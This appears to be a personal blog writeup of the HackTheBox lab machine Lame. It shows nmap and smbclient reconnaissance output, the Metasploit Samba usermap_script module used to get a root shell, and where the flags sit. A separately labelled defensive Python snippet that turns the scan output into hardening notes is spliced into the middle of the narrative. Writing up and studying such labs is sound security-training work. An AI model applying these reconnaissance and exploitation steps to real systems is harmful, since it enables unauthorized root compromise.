Jason Turley's Website

HackTheBox: Lame Writeup

Lame is a retired HTB machine.

Recon

As usual, start off with an nmap scan:

$ nmap -Pn -sV -sC 10.10.10.3 -oN nmap_scan.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times
will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-24 11:46 EDT
Nmap scan report for 10.10.10.3
Host is up (0.13s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.8
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h04m46s, deviation: 2h49m44s, median: 4m44s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-03-24T11:51:10-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.03 seconds

Lots of interesting findings! We see that the target OS is Unix and there are FTP, SSH, and Samba servers running.

Since we specified -sC, the nmap scan determined that anonymous FTP login is allowed. I explored this for a bit, but did not find anything interesting on the server.
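As an added example (not part of the original writeup), a small Python triage helper that parses nmap's normal (-oN) output like the scan above and turns the -sC findings into defender-facing notes. The excerpt is a constructed abridgement of the scan output; the rules and remediation strings are my own.

```python
import re

# Constructed, abridged copy of the nmap -oN output from the scan above.
NMAP_OUTPUT = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|      Control connection is plain text
|_End of status
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

Host script results:
| smb-security-mode:
|   account_used: <blank>
|_  message_signing: disabled (dangerous, but default)
"""

# port/proto  state  service  version...
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_ports(text):
    """Return {port: {service, version, scripts}}; host-level NSE output lands under 'host'."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = f"{m.group(1)}/{m.group(2)}"
            ports[current] = {"service": m.group(4), "version": m.group(5).strip(), "scripts": []}
        elif line.startswith("Host script results"):
            current = "host"
            ports[current] = {"service": "", "version": "", "scripts": []}
        elif line.startswith("|") and current:
            ports[current]["scripts"].append(line.lstrip("|_ ").strip())
    return ports

def triage(ports):
    """Map the NSE script lines and banners to concrete hardening notes."""
    findings = []
    for port, info in ports.items():
        scripts = " ".join(info["scripts"])
        if "Anonymous FTP login allowed" in scripts:
            findings.append(f"{port}: anonymous FTP enabled; set anonymous_enable=NO in vsftpd.conf")
        if "Control connection is plain text" in scripts:
            findings.append(f"{port}: FTP logins cross the wire in cleartext; require TLS or move to SFTP")
        if "message_signing: disabled" in scripts:
            findings.append(f"{port}: SMB signing disabled; set 'server signing = mandatory' in smb.conf")
        if info["service"] == "netbios-ssn" and "3.0.20" in info["version"]:
            findings.append(f"{port}: Samba 3.0.20 matches a public Metasploit module (usermap_script); upgrade")
    return findings

if __name__ == "__main__":
    for f in triage(parse_ports(NMAP_OUTPUT)):
        print(f)
```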

The same is true for the Samba server. Running smbclient -L shows that there are several shares listed:

$ smbclient -L //10.10.10.3/   
Enter WORKGROUP\kali's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME

I searched the shares, but again, nothing interesting was found.

Since there aren’t any leaked credentials or other obvious leads, let’s search around for an exploit. In my experience with CTFs, if Samba is running then it is usually exploitable. Let’s search for a Samba 3.0.20 exploit!

Exploitation

There is only one module available in metasploit when searching for Samba 3.0.20:

> search samba 3.0.20
Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

Well, this makes our job easy!

Set the RHOSTS and LHOST options to the correct IP addresses and run the exploit. After a few seconds you should get a root shell! (Note: there is no prompt)

whoami
root
id
uid=0(root) gid=0(root)

From here the user and root flags can be found in /home/makis/user.txt and /root/root.txt respectively.

Concluding Thoughts

Lame is a pretty straightforward machine that is great for beginners. I probably spent too much time on the FTP and Samba share rabbit holes, but oh well, I didn’t want to miss anything.